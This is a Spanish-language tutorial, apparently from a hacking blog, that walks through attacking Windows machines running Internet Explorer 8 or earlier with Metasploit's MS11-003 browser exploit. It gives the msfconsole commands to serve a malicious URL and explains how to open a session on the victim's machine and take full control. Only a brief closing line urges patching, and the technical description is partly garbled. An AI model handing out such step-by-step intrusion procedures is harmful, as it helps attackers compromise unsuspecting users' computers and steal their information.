Existe una vulnerabilidad en las versiones 8 y anteriores de Internet Explorer que permite a un atacante vulnerar cualquier Sistema Operativo
que contengan estas versiones vulnerables. Recordar que en la actualidad
existen muchos exploits remotos que pueden vulnerar este navegador,
pero esta vulnerabilidad no es muy "conocida" por los usuarios ya que
hasta la actualidad se puede seguir explotando.
El respectivo modulo que se integra en Metasploit se aprovecha de una
vulnerabilidad de corrupción de memoria en Microsoft\'s HTML motor
(mshtml). Este exploit utiliza una combinación de aspersión y el módulo
de almacenamiento dinámico 'mscorie.dll' la 2.0. NET para bypassear DEP y
ASLR aprovechándose así para tomar el control total del sistema
vulnerable.
A continuacion se detallaran los procedimientos que un atacante
realizara cuando desee vulnerar cualquier sistema operativo que contenga
esta vulnerabilidad.
REQUERIMIENTOS:
- BackTrack 5 R1 - R2 o R3 (Atacante)
- Metasploit Framework (Atacante)
- Windows XP - 7 - 8 (Victima)
- Internet Explorer 8 u anteriores (Victima)
PROCEDIMIENTOS:
En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.1.33
set SRVPORT 80
set URIPATH
exploit
-------------------------------------------------------------------------------------------------------------
Estos comandos crearan una URL con nuestra IP en la que contiene los archivos maliciosos que la victima tendrá que ejecutar desde su navegador, la cual metasploit enviara los siguientes archivos tratando de vulnerar el sistema:
Si nuestro exploit detecta que el sistema es vulnerable y los archivos enviados se logran ejecutar exitosamente en el navegador, esta devolverá una conexión entre nuestro ordenador y el sistema vulnerado.
Seguidamente ejecutamos el comando sessions -i 1 para interactuar con el
sistema vulnerado y aprovecharnos al máximo de su sistema.
CONCLUSIÓN:
Para no ser victima de estos ataques que nos pueden costar mucha
(informacion), es muy necesario mantener nuestro sistema totalmente
actualizado a una version mayor de la vulnerable, y estar al tanto de
los nuevos exploits que nos pueden afectar hoy en dia y quiza en un
futuro no muy lejano.
Saludos y hasta la próxima oportunidad ;)